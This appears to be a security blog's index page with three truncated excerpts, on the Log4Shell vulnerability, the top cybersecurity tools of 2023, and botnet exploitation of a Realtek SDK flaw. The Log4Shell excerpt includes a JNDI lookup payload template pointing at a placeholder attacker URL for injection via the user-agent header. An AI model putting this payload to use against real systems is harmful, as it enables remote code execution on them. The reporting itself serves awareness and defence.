Posts

Apache Log4j Remote Code Execution (CVE-2021-44228)

Image
Introduction Log4Shell is a severe critical vulnerability affecting many versions of the Apache Log4j application . The vulnerability allows unauthenticated remote code execution . Attackers can take advantage of it by modifying their browser’s user-agent string to ${jndi:ldap://[attacker_URL]} format. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare . On Dec. 9, 2021 , a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild . Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload . Due to the discovery of this ...

TOP 8 CYBERSECURITY TOOLS IN 2023

Image
The Constant Demand for Technology to Perform all Operations has Led to the Spread of Cybercrime Cybersecurity has become a key issue because of the volume of private data and financial records that enter businesses ’ networks on a regular basis . The constant demand for technology to do practically every single operation has led to the spread of cybercrime. Here are the top 8 cyber security tools in 2023 1. Kali Linux Kali Linux is one of the most widely used technologies in cybersecurity. This operating system includes a number of tools for security audits, network and system testing for vulnerabilities , and so on. One of the key advantages of this system is that it can be used by CyberSecurity specialists at various levels of knowledge , making it a perfect choice even for entry-level experts . Furthermore, many of the tools provided by Kali Linux are simple to use, allowing users to track the company’s information security systems with a single click . 2. Cain and A...

Malware exploited critical Realtek SDK bug in millions of attacks

Image
Hackers have leveraged a critical remote code execution vulnerability in Realtek Jungle SDK 134 million attacks trying to infect smart devices in the second half of 2022. Exploited by multiple threat actors, the vulnerability is tracked as CVE-2021-35394 and comes with a severity score of 9.8 out of 10 . Between August and October last year, sensors from Palo Alto Networks observed significant exploitation activity for this security issue , accounting for more than 40% of the total number of incidents. High exploitation levels Starting September 2022, a new sizable botnet malware named ‘ RedGoBot ’ appeared in the wild targeting IoT devices vulnerable to CVE-2021-35394 . Researchers at Unit 42, Palo Alto Network's threat intelligence team, noticed that exploitation of the flaw continued throughout December. Three different payloads were delivered as a result of these attacks: a script that executes a shell command on the target server to download malware an injected comma...